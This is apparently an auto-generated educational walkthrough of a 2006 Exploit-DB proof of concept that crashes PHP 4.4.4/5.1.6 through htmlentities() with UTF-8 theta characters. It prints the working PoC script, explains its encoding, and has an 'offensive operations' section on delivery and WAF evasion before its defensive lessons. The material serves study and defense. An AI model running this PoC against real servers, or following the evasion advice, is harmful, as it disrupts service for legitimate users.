By exploitdb papers bot, November 27, 2006

PHP htmlentities() Local Buffer Overflow - Educational Walkthrough

What this paper is

This paper is a Proof-of-Concept (PoC) demonstrating a local buffer overflow vulnerability in specific versions of PHP (4.4.4 and 5.1.6). The vulnerability is triggered by the htmlentities() function when processing specially crafted UTF-8 strings. The primary impact described is a Denial of Service (DoS).

Simple technical breakdown

The exploit targets how htmlentities() handles certain characters in a UTF-8 encoded string. htmlentities() replaces characters with HTML entities, so its output can be several times longer than its input. According to the author's comment, the vulnerable code assumed a replacement of at most 8 characters, and the buffer it writes into is not large enough for characters whose entity is longer. A string made of many such characters overflows this buffer, corrupting memory and crashing the PHP process (DoS). The PoC uses a helper function, toUTF(), to build the two-byte UTF-8 encoding of the problematic character, U+03D1 (GREEK THETA SYMBOL).

Complete code and payload walkthrough

Let's break down the provided PHP code and the logic behind it.

<?php
	/*	    Nick Kezhaya	*/
	/*    www.whitepaperclip.com 	*/

	//instantiate a string
	$str1 = "";

	for($i=0; $i < 64; $i++) {
		$str1 .= toUTF(977); //MUST start with 977 before bit-shifting
	}

	htmlentities($str1, ENT_NOQUOTES, "UTF-8"); //DoS here
	/*
		htmlentities() method automatically assumes
		it is a max of 8 chars.  uses greek theta
		character bug from UTF-8
	*/

?>

<?php
	function toUTF($x) {
		return chr(($x >> 6) + 192) . chr(($x & 63) + 128);
	}
?>

# milw0rm.com [2006-11-27]

Code Fragment/Block -> Practical Purpose:

<?php ... ?>: Standard PHP opening and closing tags, enclosing the script's logic.
/* ... */: Multi-line comments, providing author information and a brief explanation of the exploit.
// ...: Single-line comments, explaining specific lines of code.
$str1 = "";: Initializes an empty string variable named $str1. This string will be built up to contain the malicious input.
for($i=0; $i < 64; $i++) { ... }: A loop that iterates 64 times. In each iteration, it appends a character generated by toUTF(977) to $str1.
$str1 .= toUTF(977);: Appends the result of the toUTF() function (with the argument 977) to the $str1 string.
htmlentities($str1, ENT_NOQUOTES, "UTF-8");: This is the core function call that triggers the vulnerability.
- $str1: The input string containing the crafted characters.
- ENT_NOQUOTES: A flag indicating that no quotes should be encoded.
- "UTF-8": Specifies the character encoding of the input string.
function toUTF($x) { ... }: Defines a helper function named toUTF that takes an integer $x as input.
return chr(($x >> 6) + 192) . chr(($x & 63) + 128);: This is the logic within toUTF() for converting an integer into a two-byte UTF-8 sequence.
- $x >> 6: Bitwise right shift of $x by 6 bits. This isolates the higher-order bits.
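- + 192: Adds 192 (binary 11000000) to the shifted value, producing the 110xxxxx pattern that marks the first byte of a two-byte UTF-8 sequence. Addition behaves like a bitwise OR here because, for values up to 2047 (0x7FF), the shifted value fits in the low five bits.
- chr(...): Converts the resulting integer (0-255) into a one-byte string. Values above 127 are not ASCII; here they are raw UTF-8 bytes.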
- $x & 63: Bitwise AND operation of $x with 63 (binary 00111111). This isolates the lower 6 bits of $x.
- + 128: Adds 128 to the isolated lower bits. This is the second byte of the UTF-8 sequence, which starts with 10xxxxxx. 128 is 10000000 in binary.
- .: String concatenation, joining the two generated characters.
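The same bit layout can be written as a standalone function. The sketch below is a hypothetical rewrite of toUTF() (the name utf8_two_byte is ours, not the author's). It uses bitwise OR instead of addition, which gives identical results in the two-byte range, and adds a range check, since toUTF() as written silently produces invalid bytes for values outside U+0080 to U+07FF. It assumes PHP 7 or later for the \u{...} string escape used in the comparison.

```php
<?php
declare(strict_types=1);

// Hypothetical rewrite of the PoC's toUTF(): encodes one code point in the
// two-byte UTF-8 range (U+0080..U+07FF) and rejects anything else.
function utf8_two_byte(int $cp): string
{
    if ($cp < 0x80 || $cp > 0x7FF) {
        throw new InvalidArgumentException(
            sprintf('U+%04X does not use a two-byte UTF-8 sequence', $cp)
        );
    }
    // Lead byte 110xxxxx: the top 5 of the 11 payload bits.
    $lead = 0xC0 | ($cp >> 6);
    // Continuation byte 10xxxxxx: the low 6 payload bits.
    $cont = 0x80 | ($cp & 0x3F);
    return chr($lead) . chr($cont);
}

$theta = utf8_two_byte(977);
echo bin2hex($theta), PHP_EOL;      // cf91
var_dump($theta === "\u{3D1}");     // bool(true)
```

The comparison against "\u{3D1}" confirms that the hand-built bytes match PHP's own encoding of the same code point.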

Explanation of toUTF(977):

The integer 977 in binary is 1111010001.

First byte calculation:
- 977 >> 6: 1111010001 shifted right by 6 becomes 1111.
- 15 + 192: 15 (binary 1111) + 192 (binary 11000000) = 207 (binary 11001111, hex 0xCF).
- chr(207): Produces the single byte 0xCF. Shown on its own in ISO-8859-1 or Windows-1252 it would appear as 'Ï' (Latin Capital Letter I with diaeresis), but here it is the lead byte of a two-byte UTF-8 sequence, not a character by itself.
Second byte calculation:
- 977 & 63: 1111010001 AND 0000111111 = 0000010001, i.e. 010001 (decimal 17).
- 17 + 128: 17 (binary 010001) + 128 (binary 10000000) = 145 (binary 10010001, hex 0x91).
- chr(145): Produces the byte 0x91, the continuation byte. On its own it would display as '‘' (Left Single Quotation Mark) in Windows-1252; in ISO-8859-1 it is a control code.
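The hand calculation above can be checked mechanically. This short script repeats the two steps of toUTF(977), prints each value in decimal, binary, and hex, and then decodes the two bytes back to confirm that they carry the code point 977 (U+03D1).

```php
<?php
// Recomputes toUTF(977) one step at a time, then decodes the result again.
$x = 977;

$high = $x >> 6;     // bits above the low six
$low  = $x & 63;     // low six bits
$b1   = $high + 192; // lead byte, 110xxxxx
$b2   = $low + 128;  // continuation byte, 10xxxxxx

printf("x        = %d (%s)\n", $x, decbin($x));
printf("x >> 6   = %d, + 192 = %d (%s, 0x%02X)\n", $high, $b1, decbin($b1), $b1);
printf("x & 63   = %d, + 128 = %d (%s, 0x%02X)\n", $low, $b2, decbin($b2), $b2);

// Decoding strips the marker bits and reassembles the 11-bit payload.
$decoded = (($b1 & 0x1F) << 6) | ($b2 & 0x3F);
printf("decoded  = %d (U+%04X)\n", $decoded, $decoded);
```

It should report 207 (0xCF) and 145 (0x91) for the two bytes and decode back to 977 (U+03D1).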

So toUTF(977) produces the bytes 0xCF 0x91, the UTF-8 encoding of U+03D1 (977 = 0x3D1), GREEK THETA SYMBOL (ϑ). The specific character does matter: it is the "greek theta" in the author's comment, and htmlentities() converts it to the named entity &thetasym;, which is 10 characters long (the 8-letter name plus '&' and ';'). The comment says the function "assumes it is a max of 8 chars"; one plausible reading is that the vulnerable code underestimated how long a single replacement could be. The paper does not show the vulnerable source, so the exact buffer-sizing arithmetic is not confirmed here.

The loop runs 64 times, appending this two-byte sequence each time, so $str1 is 128 bytes long. If each theta is replaced by &thetasym; (10 bytes), htmlentities() must produce 640 bytes of output from 128 bytes of input. On the affected versions the output buffer is not grown enough to hold this expansion, so the function writes past the end of its allocation, corrupting memory and crashing the interpreter.
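On a current, patched PHP build the same input can be processed safely to measure the expansion that the vulnerable versions mishandled. This sketch assumes PHP 7 or later (for the \u{3D1} escape) and relies on htmlentities() mapping U+03D1 to the HTML 4.01 named entity &thetasym;, which is its default behavior. It does not reproduce the crash, which needs one of the affected versions.

```php
<?php
// Measures how much htmlentities() expands PoC-style input on a patched
// PHP build. Run only on a supported PHP version.
$theta = "\u{3D1}"; // U+03D1 GREEK THETA SYMBOL, bytes CF 91

$entity = htmlentities($theta, ENT_NOQUOTES, 'UTF-8');
printf("one character: %d bytes in, %s (%d bytes) out\n",
    strlen($theta), $entity, strlen($entity));

// Same shape as the PoC's loop: 64 copies of the two-byte sequence.
$input  = str_repeat($theta, 64);
$output = htmlentities($input, ENT_NOQUOTES, 'UTF-8');
printf("PoC-sized input: %d bytes in, %d bytes out\n",
    strlen($input), strlen($output));
```

The fivefold growth (2 bytes in, 10 bytes out per character) is the expansion that an output buffer has to accommodate.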

Shellcode/Payload Segments:

There is no explicit shellcode or executable payload in the traditional sense within this PoC. The "payload" is the crafted string itself, designed to trigger the DoS condition. The exploit does not aim to execute arbitrary code; its sole purpose is to cause the PHP interpreter to crash.

Practical details for offensive operations teams

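Required Access Level: The PoC is classified as a local buffer overflow. As written, it has to run as a PHP script on the target, so the attacker must already be able to execute PHP there, for example through a web application flaw (file upload, code injection) or direct shell access. The flawed code, however, is htmlentities() itself, so an application on an affected version that passes attacker-supplied UTF-8 text to htmlentities() could reach the same code path; this is why input validation appears among the pitfalls below. In either case, the demonstrated impact is a crash; the PoC does not show code execution.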
Lab Preconditions:
- A target system running PHP versions 4.4.4 or 5.1.6.
- The ability to execute PHP scripts on the target. This could be via a web server (e.g., Apache, IIS) with PHP configured, or directly via the command-line PHP interpreter.
- htmlentities() must be available, i.e. not listed in disable_functions in php.ini.
Tooling Assumptions:
- A web browser or command-line interface to deliver the PHP script.
- A text editor to create and modify the PHP exploit script.
- Potentially, a debugger or crash analysis tool on the target to confirm the crash and analyze its nature if deeper investigation is needed.
Execution Pitfalls:
- PHP Version Specificity: The exploit is highly dependent on the exact PHP versions mentioned. Newer versions are likely patched.
- Configuration Differences: The behavior of htmlentities() might be influenced by other PHP configurations or extensions, though this is less likely for a core function overflow.
- Environment: The exact overflow behavior and crash might vary slightly depending on the operating system and architecture, but the DoS outcome is expected.
- Input Validation: If the web application has robust input validation that sanitizes or limits the length of strings passed to PHP functions, this exploit might be prevented.
- Resource Limits: The target system might have process limits or watchdog mechanisms that could restart the PHP interpreter, masking the DoS or making it transient.
Tradecraft Considerations:
- Reconnaissance: Confirming the target PHP version is paramount. This can often be done by examining HTTP headers (e.g., X-Powered-By) or by using specific PHP information disclosure vulnerabilities.
- Delivery: The script can be delivered as a standalone PHP file uploaded to a web server and accessed via a URL, or executed directly on a compromised shell.
- Obfuscation: For web delivery, the PHP code might need to be obfuscated to bypass basic web application firewalls or intrusion detection systems that might flag known exploit patterns. However, the core logic here is quite simple.
- Impact Assessment: The primary goal is DoS. Operators should be aware that this will disrupt service for legitimate users. It's crucial to have authorization for such disruptive actions.
Likely Failure Points:
- Incorrect PHP Version: The most common failure point.
- Function Disabled: htmlentities() or related functions might be disabled in php.ini.
- Input Sanitization: The web application might prevent the malicious string from reaching the vulnerable function.
- Patching: The target system may have been patched against this specific vulnerability.
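Two of the preconditions and failure points above, the PHP version and whether htmlentities() is disabled, can be read from inside PHP. The helper below is a hypothetical sketch (its function and constant names are ours). It reports whether a version string is one of the two the paper names and whether a function name appears in a disable_functions value. It deliberately checks only the exact versions from the paper title and does not claim to know the full range of affected releases.

```php
<?php
// Hypothetical environment check for the paper's stated preconditions.
const PAPER_LISTED_VERSIONS = ['4.4.4', '5.1.6']; // from the paper title

function is_listed_version(string $version): bool
{
    return in_array($version, PAPER_LISTED_VERSIONS, true);
}

// disable_functions is a comma-separated list; spacing and case may vary.
function is_function_disabled(string $name, string $disableFunctions): bool
{
    $names = array_filter(array_map('trim', explode(',', strtolower($disableFunctions))));
    return in_array(strtolower($name), $names, true);
}

$disabled = (string) ini_get('disable_functions');
printf("PHP %s listed in paper: %s\n",
    PHP_VERSION, is_listed_version(PHP_VERSION) ? 'yes' : 'no');
printf("htmlentities disabled: %s\n",
    is_function_disabled('htmlentities', $disabled) ? 'yes' : 'no');
```

Exact string matching is intentional: distribution builds often append suffixes to PHP_VERSION, and a looser match would risk false positives.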

Where this was used and when

This exploit was published on milw0rm on 27 November 2006, when PHP 4 and early PHP 5 releases were widely deployed. Reports of buffer overflows in PHP's C core were common in the mid-2000s, and string-handling functions such as htmlentities() came under scrutiny. The paper itself demonstrates only a crash and gives no evidence that this specific PoC was used in real attacks; its value is as a documented example of a buffer overflow reachable through a core PHP function.

Defensive lessons for modern teams

Keep PHP Updated: This is the most critical defense. Regularly update PHP to the latest stable versions to patch known vulnerabilities.
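Input Validation and Sanitization: Implement robust input validation on all user-supplied data before it reaches PHP functions, and reject malformed encodings or unexpected character sequences. Treat this as defense in depth: the PoC string is short, well-formed UTF-8, so encoding checks alone would not have blocked it.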
Web Application Firewalls (WAFs): Use WAFs to detect and block known malicious patterns, including those that might attempt to exploit common vulnerabilities.
Least Privilege: Run web servers and PHP processes with the minimum necessary privileges to limit the impact of any potential compromise.
Monitoring and Alerting: Monitor server logs for unusual activity, such as frequent PHP interpreter crashes or high error rates, which could indicate an attempted or successful exploit.
Code Auditing: For custom PHP applications, conduct regular security audits and code reviews to identify potential vulnerabilities.
disable_functions: While not a primary defense against all vulnerabilities, judicious use of disable_functions in php.ini can mitigate the impact of certain exploits if specific functions are not required for the application's operation.
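The validation advice above can be combined with output encoding in a small wrapper. This is a hypothetical sketch (safe_entities and its 4096-byte default are our choices, not a PHP API) for PHP 7.1 or later: it rejects oversized or malformed UTF-8 before calling htmlentities(). It is defense in depth, not a fix for an interpreter bug.

```php
<?php
declare(strict_types=1);

// Hypothetical wrapper: validate before encoding. Returns null when the input
// is rejected so the caller can decide how to respond.
function safe_entities(string $input, int $maxBytes = 4096): ?string
{
    // Cap the size of user-supplied text before any further processing.
    if (strlen($input) > $maxBytes) {
        return null;
    }
    // preg_match() with the /u modifier returns false for malformed UTF-8.
    if (preg_match('//u', $input) !== 1) {
        return null;
    }
    // ENT_SUBSTITUTE is a fallback: invalid sequences would become U+FFFD
    // instead of an empty result.
    return htmlentities($input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

var_dump(safe_entities('<b>"hi"</b>'));
var_dump(safe_entities("\xC3\x28")); // malformed two-byte sequence
```

Returning null rather than an empty string keeps "rejected" distinguishable from "legitimately empty" input.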

ASCII visual

This exploit is a direct function call vulnerability. There isn't a complex architecture or flow to visualize. The process is linear:

+-----------------+      +-------------------+      +-------------------+
| Attacker Input  |----->| PHP Interpreter   |----->| htmlentities()    |
| (Crafted String)|      | (Vulnerable Ver.) |      | (Internal Buffer) |
+-----------------+      +-------------------+      +-------------------+
                                                            |
                                                            v
                                                      +-----------+
                                                      |   Crash   |
                                                      |    (DoS)  |
                                                      +-----------+

Source references

PAPER ID: 2857
PAPER TITLE: PHP 4.4.4/5.1.6 - 'htmlentities()' Local Buffer Overflow (PoC)
AUTHOR: Nick Kezhaya
PUBLISHED: 2006-11-27
PAPER URL: https://www.exploit-db.com/papers/2857
RAW URL: https://www.exploit-db.com/raw/2857

Original Exploit-DB Content (Verbatim)

<?php
	/*	    Nick Kezhaya	*/
	/*    www.whitepaperclip.com 	*/
	
	//instantiate a string
	$str1 = "";
	
	for($i=0; $i < 64; $i++) {
		$str1 .= toUTF(977); //MUST start with 977 before bit-shifting
	}
	
	htmlentities($str1, ENT_NOQUOTES, "UTF-8"); //DoS here
	/*
		htmlentities() method automatically assumes
		it is a max of 8 chars.  uses greek theta
		character bug from UTF-8
	*/
	
?>

<?php
	function toUTF($x) {
		return chr(($x >> 6) + 192) . chr(($x & 63) + 128);
	}
?>

# milw0rm.com [2006-11-27]